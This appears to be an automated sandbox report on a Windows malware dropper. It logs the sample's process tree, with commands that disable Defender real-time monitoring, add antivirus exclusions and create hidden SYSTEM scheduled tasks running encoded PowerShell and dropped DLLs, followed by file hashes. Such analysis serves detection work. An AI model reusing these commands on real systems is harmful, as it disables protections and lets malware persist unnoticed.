C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:292
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1280
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goofleDOi" /SC once /ST 01:50:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goofleDOi"4⤵PID:1508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goofleDOi"4⤵PID:672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmPPeHndeZJiZewMwY" /SC once /ST 09:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\NhYRGfZ.exe\" pT /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1560
-
-
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:321⤵PID:1700
-
C:\Windows\system32\taskeng.exetaskeng.exe {66CF9E5D-1A09-49D0-8860-5B7102B1B0E8} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵PID:1964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:552 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:824
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1364
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1516
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2024
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2012
-
C:\Windows\system32\taskeng.exetaskeng.exe {4A11E3B9-A9EF-426B-8449-30779E66AA8F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\NhYRGfZ.exeC:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\NhYRGfZ.exe pT /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:524 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpgFkvjae" /SC once /ST 03:01:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpgFkvjae"3⤵PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpgFkvjae"3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1552
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:468
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1064
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjMdEObmH" /SC once /ST 05:03:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjMdEObmH"3⤵PID:584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjMdEObmH"3⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:323⤵PID:1152
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:643⤵PID:1724
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:323⤵PID:828
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:324⤵PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:643⤵PID:1752
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:644⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dEvNveGTTlDzBjVk\QPbRfWMX\AWCBytkhHWMtIozE.wsf"3⤵PID:1660
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dEvNveGTTlDzBjVk\QPbRfWMX\AWCBytkhHWMtIozE.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1684 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\DIqJuicHJdmqOkVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\DIqJuicHJdmqOkVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:324⤵PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:644⤵PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:324⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:644⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:324⤵PID:648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:644⤵PID:552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:324⤵PID:1824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:644⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:324⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:644⤵PID:684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\DIqJuicHJdmqOkVB" /t REG_DWORD /d 0 /reg:324⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\DIqJuicHJdmqOkVB" /t REG_DWORD /d 0 /reg:644⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG" /t REG_DWORD /d 0 /reg:324⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG" /t REG_DWORD /d 0 /reg:644⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:644⤵PID:1620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dEvNveGTTlDzBjVk" /t REG_DWORD /d 0 /reg:324⤵PID:1760
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gizKiZlOc" /SC once /ST 03:20:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gizKiZlOc"3⤵PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gizKiZlOc"3⤵PID:1192
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:660
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1552
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:684
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VxfUuShlQNbdQSXLl" /SC once /ST 01:26:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\UFrutAS.exe\" Xe /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VxfUuShlQNbdQSXLl"3⤵PID:480
-
-
-
C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\UFrutAS.exeC:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\UFrutAS.exe Xe /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1988 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmPPeHndeZJiZewMwY"3⤵PID:1508
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1400
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1620
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1380
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SnQMkCffU\sMaPmC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OwLyLJfWgdznQZv" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OwLyLJfWgdznQZv2" /F /xml "C:\Program Files (x86)\SnQMkCffU\AfJQDrI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OwLyLJfWgdznQZv"3⤵PID:1932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OwLyLJfWgdznQZv"3⤵PID:1768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYfjkBJVkoGZVb" /F /xml "C:\Program Files (x86)\PTcVEVWfzVfU2\aHbtFMj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MGVYQKklyNzJH2" /F /xml "C:\ProgramData\DIqJuicHJdmqOkVB\RUWnsXP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JqXblPsAvkoafrXLx2" /F /xml "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\euhhLVc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "odNIlJBFKFxjoOxUYma2" /F /xml "C:\Program Files (x86)\nNoOyOjreWgVC\rOPsWNR.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UjaziEjLbJEPTlLHt" /SC once /ST 02:09:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dEvNveGTTlDzBjVk\SQcPpUOO\vqqYWiW.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "UjaziEjLbJEPTlLHt"3⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1380
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1436
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VxfUuShlQNbdQSXLl"3⤵PID:1992
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:316
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dEvNveGTTlDzBjVk\SQcPpUOO\vqqYWiW.dll",#1 /site_id 5254032⤵PID:1568
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dEvNveGTTlDzBjVk\SQcPpUOO\vqqYWiW.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1616 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UjaziEjLbJEPTlLHt"4⤵PID:1456
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1620
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1400
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1868
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:641⤵PID:1592
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b963afa565ec14a2a28609bb8cfaedf5
SHA1775bce189117e2656d4704f018d251c1d6b50180
SHA256cc41c462be84d0d4ef4869fb9d7422eb0899eb8a81334f810515677bf482ffef
SHA5129d761cdeadf9c49067db5754b361bc3900495a46a4fd238763c8f9fc801f233887809facb86125c1a98ea2181cf4c701204f3bb611a046a2b2b4b0cbce68823e
-
Filesize
2KB
MD5d489bd32dfc899967bac141e81b144b5
SHA18466aae3987598684f67d176f7e10c641198e176
SHA2566ecb7e80de16f0c0d9c189bea7fdcd517f3728ba85183cc1bc1befd9312b4864
SHA512eb4bc99c0982a11fa49c6bfbff1e847fdbf227fa169a8946182e0566630fcb4f4379c91ebaadb4e47440b40fb0dd9d35ee9a089ab7a83c0b99bb6e3f1bd672e5
-
Filesize
2KB
MD51c092bd1580c4bbc55ab916f992de17d
SHA183488c7dcccde2a7a2f850a582917fbb3a69a836
SHA25684053de02c93ade85e4bdf00ecd2d833b61333592ca76f66ccb8bae5772ec58d
SHA5126d53bc01a1b9f0d8aa6771003ea5f32dd4b6dbd7c1c882a7d9106d6d8ebe3b446d97db995f84b43893b6b94480ace34b91ae1df22a8b93109e82a11687f96d27
-
Filesize
2KB
MD539337045df6a7f89778f4f76dc1db500
SHA174d05043f5813713e066278f8de91b912f1b53cb
SHA256f3b176737976556a14d1b8cacd212b8f0f66b808bd5219dc3e7bbc2b5a21b996
